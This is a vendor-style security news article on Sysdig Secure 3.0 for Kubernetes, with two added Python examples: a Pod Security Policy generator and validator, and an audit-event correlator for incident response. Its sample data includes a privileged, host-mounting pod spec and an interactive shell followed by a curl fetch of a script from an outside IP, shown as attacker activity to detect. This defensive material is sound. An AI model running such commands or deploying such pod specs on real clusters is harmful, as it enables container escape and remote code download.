Security News

Sysdig Secure 3.0 Introduces Native Prevention & Incident Response for Kubernetes

Sysdig has announced Sysdig Secure 3.0, which it describes as the industry's first tool to give enterprises threat prevention at runtime using Kubernetes-native Pod Security Policies (PSPs). The release also includes what Sysdig calls the first incident response and audit tool built specifically for Kubernetes environments.

Sysdig Secure embeds security and compliance into the build, run and respond stages of the Kubernetes lifecycle. With Sysdig, enterprises can embed security, maximize availability, and validate compliance. Sysdig Secure integrates into your secure DevOps workflow, giving you the confidence to run Kubernetes in production.

This release has three main features:

Kubernetes Policy Advisor prevents threats at runtime using Kubernetes Pod Security Policies.

Falco Tuning optimizes Falco rules to reduce false positives and alert fatigue.

Activity Audit speeds incident response and enables audit by correlating container and Kubernetes activity.

As DevOps teams ramp Kubernetes in production, their responsibilities expand beyond monitoring, capacity management and troubleshooting to include security and compliance. Teams are looking to merge these two functions into a single secure DevOps workflow. The new features of Secure 3.0 streamline security responsibilities for DevOps teams, so they can focus on maximizing availability of their Kubernetes platform.

Kubernetes Pod Security Policies are cluster-level resources, enforced by an admission controller, that define what a pod spec may request: whether it can run privileged, use the host network or PID namespace, which volume types and Linux capabilities it may use, and which user it must run as. They ensure that pods run with appropriate privileges and can only access the resources they need.

Kubernetes Policy Advisor creates a three-step workflow for implementing PSPs:

Generate: Sysdig Secure auto-generates a restrictive PSP from the pod spec in a deployment's YAML definition, significantly reducing the time spent hand-writing security policies.

Validate: Policy Advisor validates the policies prior to enforcement to ensure they do not break application functionality. Comparing the PSP against the application runtime behavior, teams can tweak the policy to be more or less permissive. This iterative process gives confidence in the expected pod behavior in production.

Prevent: Sysdig leverages the Kubernetes-native PSP admission controller to handle enforcement. Because the decision is made by the API server when the pod is created, nothing is injected into the container infrastructure and there is no runtime performance impact.
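The generate and validate steps above boil down to reading security-relevant fields out of a pod spec. The following is an added example for this article, not Sysdig's Policy Advisor code: it derives the tightest PSP that still admits a known-good pod spec, then reports what a second, more privileged spec would violate. The field names follow the policy/v1beta1 PodSecurityPolicy schema; the two sample pod specs, the policy name and the violation strings are constructed for the example. One caveat for readers today: PodSecurityPolicy was deprecated in Kubernetes 1.21 and removed in 1.25, but most of these same fields are what the Pod Security Admission "restricted" profile checks, so the validation logic carries over.

```python
"""Generate-then-validate for Kubernetes Pod Security Policies.

Added illustration for this article (not Sysdig's code). Field names follow
the policy/v1beta1 PodSecurityPolicy schema; sample specs are constructed.
"""

# Constructed sample: the pod spec of a well-behaved deployment.
SAMPLE_POD_SPEC = {
    "hostNetwork": False,
    "hostPID": False,
    "volumes": [
        {"name": "cfg", "configMap": {"name": "app-config"}},
        {"name": "scratch", "emptyDir": {}},
    ],
    "containers": [{
        "name": "web",
        "securityContext": {
            "runAsUser": 1000,
            "privileged": False,
            "allowPrivilegeEscalation": False,
            "readOnlyRootFilesystem": True,
            "capabilities": {"add": ["NET_BIND_SERVICE"]},
        },
    }],
}

# Constructed sample: a pod spec an attacker (or a careless chart) might submit.
ESCALATED_POD_SPEC = {
    "hostPID": True,
    "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
    "containers": [{"name": "shell", "securityContext": {"privileged": True}}],
}


def _containers(pod_spec):
    return pod_spec.get("containers", []) + pod_spec.get("initContainers", [])


def _volume_types(pod_spec):
    # Each volume entry has a "name" plus exactly one type key (hostPath, ...).
    return {k for v in pod_spec.get("volumes", []) for k in v if k != "name"}


def generate_psp(name, pod_spec):
    """Derive the most restrictive PSP that still admits pod_spec."""
    scs = [c.get("securityContext", {}) for c in _containers(pod_spec)]
    users = [sc.get("runAsUser") for sc in scs]
    non_root = bool(users) and all(u is not None and u > 0 for u in users)
    caps = sorted({cap for sc in scs for cap in sc.get("capabilities", {}).get("add", [])})
    return {
        "apiVersion": "policy/v1beta1",
        "kind": "PodSecurityPolicy",
        "metadata": {"name": name},
        "spec": {
            "privileged": any(sc.get("privileged", False) for sc in scs),
            # Kubernetes defaults allowPrivilegeEscalation to true when unset.
            "allowPrivilegeEscalation": any(sc.get("allowPrivilegeEscalation", True) for sc in scs),
            "readOnlyRootFilesystem": all(sc.get("readOnlyRootFilesystem", False) for sc in scs),
            "hostNetwork": bool(pod_spec.get("hostNetwork", False)),
            "hostPID": bool(pod_spec.get("hostPID", False)),
            "hostIPC": bool(pod_spec.get("hostIPC", False)),
            "allowedCapabilities": caps,
            "volumes": sorted(_volume_types(pod_spec)),
            "runAsUser": {"rule": "MustRunAsNonRoot" if non_root else "RunAsAny"},
            # Required PSP fields that the sample spec does not constrain.
            "seLinux": {"rule": "RunAsAny"},
            "supplementalGroups": {"rule": "RunAsAny"},
            "fsGroup": {"rule": "RunAsAny"},
        },
    }


def validate(psp, pod_spec):
    """Return the list of violations; an empty list means the pod is admitted."""
    spec = psp["spec"]
    violations = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if pod_spec.get(flag, False) and not spec[flag]:
            violations.append(f"{flag} is not allowed")
    allowed_volumes = set(spec["volumes"])
    for vol in pod_spec.get("volumes", []):
        for vtype in (k for k in vol if k != "name"):
            if vtype not in allowed_volumes and "*" not in allowed_volumes:
                violations.append(f"volume {vol['name']}: type {vtype} is not allowed")
    for c in _containers(pod_spec):
        sc, name = c.get("securityContext", {}), c["name"]
        if sc.get("privileged", False) and not spec["privileged"]:
            violations.append(f"container {name}: privileged is not allowed")
        if sc.get("allowPrivilegeEscalation", True) and not spec["allowPrivilegeEscalation"]:
            violations.append(f"container {name}: allowPrivilegeEscalation must be false")
        for cap in sc.get("capabilities", {}).get("add", []):
            if cap not in spec["allowedCapabilities"]:
                violations.append(f"container {name}: capability {cap} is not allowed")
        if spec["runAsUser"]["rule"] == "MustRunAsNonRoot" and not sc.get("runAsUser"):
            violations.append(f"container {name}: must run as a non-root user")
        if spec["readOnlyRootFilesystem"] and not sc.get("readOnlyRootFilesystem", False):
            violations.append(f"container {name}: root filesystem must be read-only")
    return violations


if __name__ == "__main__":
    psp = generate_psp("web-restricted", SAMPLE_POD_SPEC)
    print("known-good pod:", validate(psp, SAMPLE_POD_SPEC) or "admitted")
    for v in validate(psp, ESCALATED_POD_SPEC):
        print("escalated pod:", v)
```

Running it shows the known-good spec admitted and six violations for the escalated one (hostPID, a hostPath volume, a privileged container that may also escalate privileges, no non-root user and a writable root filesystem). Note the treatment of unset fields: `allowPrivilegeEscalation` defaults to true and `runAsUser` to whatever the image says, so a validator that only checks fields the spec sets explicitly will wave through exactly the pods a restrictive policy is meant to stop.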

Activity Audit is the first Kubernetes-native tool for incident response

Without the ability to map system activity to users or services, security teams have no way to uncover malicious behavior and misconfigurations within Kubernetes.

Sysdig’s Activity Audit speeds incident response and enables audit for Kubernetes. Sysdig captures relevant information like:

executed commands inside the container

network connections

Kubernetes API audit events, such as a user running kubectl exec

By correlating this information with Kubernetes application context (namespace, deployment, pod, user), the SOC team can spot abnormal activity. For example, they can start from a kubectl exec into a pod, identify the user behind it, and follow the chain of commands run and network connections opened inside the container afterwards.
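The correlation described above can be reproduced from two event streams: API-server audit entries for the pods/exec subresource, and container-side process and connection events keyed by namespace and pod. What follows is an added example for this article, not Sysdig's Activity Audit. The Kubernetes audit entries use the real audit.k8s.io/v1 field names (`verb`, `user.username`, `objectRef.subresource`, `requestReceivedTimestamp`); the container-side events (a Falco-style exec/connect stream), the pod names, users, timestamps, commands and the 10-minute window are all constructed for the example.

```python
"""Correlate kubectl exec audit events with the activity that followed in the pod.

Added illustration for this article (not Sysdig's code). Audit entries use
audit.k8s.io/v1 field names; the container events and all data are constructed.
"""
import json
from datetime import datetime, timedelta

# Constructed sample: two API-server audit entries, one of them a kubectl exec.
AUDIT_LOG = """
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"get","user":{"username":"ci-bot"},"objectRef":{"resource":"pods","namespace":"prod","name":"web-7d9f"},"requestReceivedTimestamp":"2019-11-05T10:00:00Z"}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"alice"},"objectRef":{"resource":"pods","subresource":"exec","namespace":"prod","name":"web-7d9f"},"requestReceivedTimestamp":"2019-11-05T10:00:05Z"}
"""

# Constructed sample: container-side activity from the same cluster (Falco-style).
CONTAINER_EVENTS = """
{"ts":"2019-11-05T10:00:06Z","type":"exec","ns":"prod","pod":"web-7d9f","cmdline":"bash -i"}
{"ts":"2019-11-05T10:00:09Z","type":"exec","ns":"prod","pod":"web-7d9f","cmdline":"curl -s http://203.0.113.5/x.sh"}
{"ts":"2019-11-05T10:00:09Z","type":"connect","ns":"prod","pod":"web-7d9f","dst":"203.0.113.5:80"}
{"ts":"2019-11-05T10:00:10Z","type":"exec","ns":"prod","pod":"api-5c1a","cmdline":"python app.py"}
{"ts":"2019-11-05T10:45:00Z","type":"exec","ns":"prod","pod":"web-7d9f","cmdline":"ls /"}
"""


def parse_ts(s):
    # fromisoformat() only accepts the "Z" suffix from Python 3.11 on.
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def load_jsonl(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def kubectl_execs(audit_events):
    """Yield (user, namespace, pod, time) for every pods/exec request."""
    for ev in audit_events:
        ref = ev.get("objectRef", {})
        if ev.get("verb") == "create" and ref.get("resource") == "pods" \
                and ref.get("subresource") == "exec":
            yield (ev["user"]["username"], ref["namespace"], ref["name"],
                   parse_ts(ev["requestReceivedTimestamp"]))


def correlate(audit_text, container_text, window=timedelta(minutes=10)):
    """Attach to each kubectl exec the container activity that followed it in that pod."""
    by_pod = {}
    for ev in load_jsonl(container_text):
        by_pod.setdefault((ev["ns"], ev["pod"]), []).append(ev)
    chains = []
    for user, ns, pod, t0 in kubectl_execs(load_jsonl(audit_text)):
        activity = [ev for ev in by_pod.get((ns, pod), [])
                    if t0 <= parse_ts(ev["ts"]) <= t0 + window]
        chains.append({"user": user, "namespace": ns, "pod": pod,
                       "exec_at": t0.isoformat(), "activity": activity})
    return chains


def commands(chain):
    return [ev["cmdline"] for ev in chain["activity"] if ev["type"] == "exec"]


def connections(chain):
    return [ev["dst"] for ev in chain["activity"] if ev["type"] == "connect"]


if __name__ == "__main__":
    for chain in correlate(AUDIT_LOG, CONTAINER_EVENTS):
        print(f"{chain['user']} exec'd into {chain['namespace']}/{chain['pod']} at {chain['exec_at']}")
        for cmd in commands(chain):
            print("  ran:", cmd)
        for dst in connections(chain):
            print("  connected to:", dst)
```

The join key is (namespace, pod) plus a time window anchored at the exec request, which is what turns an anonymous `bash -i` followed by a `curl` to an external address into "alice did this, right after her kubectl exec". The `ci-bot` GET, the event in the other pod and the `ls` 45 minutes later are left out of the chain, which is the point: without the audit event and the pod context, those container events are indistinguishable from the attacker's.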

